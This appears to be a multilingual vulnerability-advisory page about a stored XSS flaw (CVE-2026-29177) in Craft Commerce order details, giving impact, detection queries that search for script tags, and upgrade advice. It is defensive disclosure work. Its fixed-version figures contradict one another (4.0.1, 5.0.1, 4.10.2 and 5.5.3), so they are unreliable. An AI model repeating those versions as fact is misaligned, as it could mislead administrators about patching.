Plataforma
php
Componente
craftcms/commerce
Corrigido em
4.0.1
5.0.1
4.10.2
A Stored Cross-Site Scripting (XSS) vulnerability has been identified in Craft Commerce, specifically within the order details section. This allows attackers to inject malicious JavaScript code through fields like the Shipping Method Name, Order Reference, or Site Name. When a user views the order details, the injected script executes, potentially leading to session hijacking or defacement.
The primary impact of this XSS vulnerability is the potential for an attacker to execute arbitrary JavaScript code within the context of a user's browser. This could be leveraged to steal session cookies, redirect users to malicious websites, or modify the content displayed on the page. Successful exploitation could compromise user accounts and potentially lead to further attacks on the underlying system. The attack vector involves manipulating order details, making it possible to target specific users or groups of users who interact with the commerce platform.
This vulnerability was publicly disclosed on 2026-03-10. No public proof-of-concept (POC) code has been released at the time of writing, but the ease of reproduction suggests a moderate risk of exploitation. It is not currently listed on CISA KEV. The CVSS score of 2.5 indicates a low severity, but the potential for user compromise warrants prompt remediation.
Organizations using Craft Commerce versions 4.9.4 and earlier are at risk. This includes businesses relying on Craft Commerce for e-commerce functionality, particularly those with custom shipping methods or order reference systems. Shared hosting environments where multiple users share the same Craft Commerce installation are also at increased risk.
• php: Examine Craft Commerce database entries for suspicious JavaScript code in Shipping Method Name, Order Reference, and Site Name fields. Use SELECT * FROM commerceshippingmethods WHERE name LIKE '%<script%'; to identify potentially malicious entries.
• generic web: Monitor access logs for requests containing suspicious JavaScript payloads in the URL parameters related to order details.
• generic web: Review Craft Commerce plugin files for any custom code that might be vulnerable to XSS. Use grep -r '<script' /path/to/craft-commerce/plugins to search for script tags.
disclosure
Status do Exploit
EPSS
0.01% (percentil 1%)
CISA SSVC
The recommended mitigation is to upgrade Craft Commerce to version 4.10.2 or later, which includes the fix for this vulnerability. If upgrading immediately is not feasible, consider implementing input validation and sanitization on the Shipping Method Name, Order Reference, and Site Name fields to prevent the injection of malicious code. Web Application Firewalls (WAFs) configured to detect and block XSS payloads can also provide an additional layer of protection. Regularly review and update your Craft Commerce installation to ensure you are running the latest security patches.
Actualice Craft Commerce a la versión 4.10.2 o superior, o a la versión 5.5.3 o superior, según corresponda a su versión actual. Esto solucionará la vulnerabilidad XSS almacenada en los detalles del pedido.
Análise de vulnerabilidades e alertas críticos diretamente no seu e-mail.
CVE-2026-29177 is a Stored Cross-Site Scripting (XSS) vulnerability in Craft Commerce versions up to 4.9.4, allowing malicious JavaScript injection via order details fields.
Yes, if you are using Craft Commerce version 4.9.4 or earlier, you are potentially affected by this XSS vulnerability.
Upgrade Craft Commerce to version 4.10.2 or later to resolve this vulnerability. Consider input validation as a temporary workaround.
While no active exploitation has been confirmed, the ease of reproduction suggests a potential risk.
Refer to the official Craft CMS security advisory for detailed information and updates: [https://craftcms.com/security/](https://craftcms.com/security/)
Envie seu arquivo de dependências e descubra na hora se esta e outras CVEs te atingem.